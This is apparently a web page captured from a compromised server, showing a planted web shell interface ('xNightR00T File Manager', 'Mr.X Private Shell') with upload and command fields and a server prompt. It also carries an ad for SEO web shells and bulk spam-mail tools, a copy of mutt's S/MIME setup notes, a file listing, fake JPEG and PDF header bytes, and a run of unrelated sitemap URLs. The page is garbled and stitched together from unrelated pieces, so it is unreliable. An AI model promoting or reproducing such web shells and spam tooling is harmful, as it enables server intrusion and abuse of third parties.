xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
How to add use mutt's S/MIME capabilities

- Add the contents of contrib/smime.rc to your .muttrc. Don't worry about
  changing the smime_sign_as line at this point -- you'll change it later.

- Run 'smime_keys init'.

- Download and install OpenSSL.

- Get yourself a certificate. (You can get one for free from www.thawte.com,
  or pay for one from VeriSign or one of its competitors) The way the
  process generally works, the certificate will be installed "into" your web
  browser.  If you are asked what application you wish to use the
  certificate with, select Netscape. Strangely enough, "mutt" is usually not
  an option.

- Assuming you are using Mozilla, follow the instructions at
  www.verisignlabs.com/Projects/smime_docs/linux.html to export the
  certificate into a file called cert.p12. If you don't use Mozilla, you're
  on your own.

- Run "smime_keys add_p12 cert.p12"

    * When the script asks for the "Import password", enter the one you
      provided when you exported the certificate.

    * When it asks for a "PEM pass phrase", make up a new password. Every
      time you sign or decrypt a message, mutt will ask for the PEM pass
      phrase.

    * Finally, when the script asks for a label, enter an easy-to-remember
      name for the certificate, such as "me". The script output will include
      a line like:

      added private key: /home/raldi/.smime/keys/12345678.0 for raldi@verisignlabs.com

      The number (including the ".0" at the end) is your keyid. You will
      need this number in the next step.

- Edit the smime_sign_as line in your muttrc, replacing the keyid with your
  own.

- You probably want to import the trusted roots in
  contrib/ca-bundle.crt. This makes you trust anything that was ultimately
  signed by one of them. You can use "smime_keys add_root" to do so, or
  just copy ca-bundle.crt into the place you point mutt's smime_ca_location
  variable to.



Other notes

Key management is done in a way similar to OpenSSL's CA directory. Private
keys and certificates are stored in different directories, as OpenSSL
expects either to be supplied in a (distinct) file. Each directory contains
an unsorted file named '.index' wherein each line has several fields:
mailbox, keyid, label, id of the intermediate certificate and keyflags.

    * Keyid is a hashvalue derived from the subject field of a certificate
      and supplied by OpenSSL.

    * The mailbox address is derived from either From or Sender field of the
      message, and matched with the email field of the certificate. Non
      matching address pairs get rejected, as get certificates not
      containing a mailbox address at all. (These are security issues, that
      perhaps should be configurable.)

    * Label is set by the perl script (it will ask you to supply one), when
      you add your keypair to the database. So are the remaining two fields.

    * keyflags are set with certificate verification option of the perl
      script. It may take as value one of the following: i: invalid
      (verification failed), r: revoked, e: expired, u: unverified, v:
      successfully verified and finally t: trusted, in case it was
      successfully verified and you chose to trust the certificate (the
      script will ask you). Mutt will not use invalid, revoked or expired
      certificates for signing or encryption. It will ask for confirmation
      before using unverified certificates, and finally it will issue a
      warning before using successfully verified but untrusted certificates.

The purpose fields of a certificate do not get verified yet, also there is
no real check if the given file is a certificate at all.

Key retrieval is done obviously by searching the index file for a given
mailbox. If none is found, the user is presented a list of available keys
and asked to select one of those.

The certificate and key directories specified in muttrc have to exist. Mutt
will not create them. If you wish to sign messages yourself, note that this
mutt does not address any PKCS10 or PKCS12 issues (yet?); that is, you have
to get a valid certificate outside of mutt. (See above)



A certificate can be viewed by adding the following to your ~/.mailcap:

application/x-pkcs7-signature;openssl pkcs7 -in %s -inform der -noout \
-print_certs -text | less; needsterminal

Filemanager

Name Type Size Permission Actions
samples Folder 0755
COPYRIGHT File 1.73 KB 0644
ChangeLog File 770.77 KB 0644
GPL File 17.59 KB 0644
NEWS File 6.22 KB 0644
PGP-Notes.txt File 7.5 KB 0644
README File 955 B 0644
README.SECURITY File 2.41 KB 0644
README.SSL File 4.58 KB 0644
TODO File 2.3 KB 0644
advancedusage.html File 88.13 KB 0644
applying-patches.txt File 938 B 0644
configuration.html File 123.38 KB 0644
devel-notes.txt File 10.36 KB 0644
gettingstarted.html File 73.81 KB 0644
index.html File 65.77 KB 0644
intro.html File 10.91 KB 0644
manual.html File 819.07 KB 0644
manual.txt.gz File 130.42 KB 0644
mimesupport.html File 49.13 KB 0644
miscellany.html File 10.64 KB 0644
optionalfeatures.html File 51.79 KB 0644
patch-notes.txt File 1.55 KB 0644
reference.html File 388.21 KB 0644
security.html File 9 KB 0644
smime-notes.txt File 4.23 KB 0644
tuning.html File 7.9 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml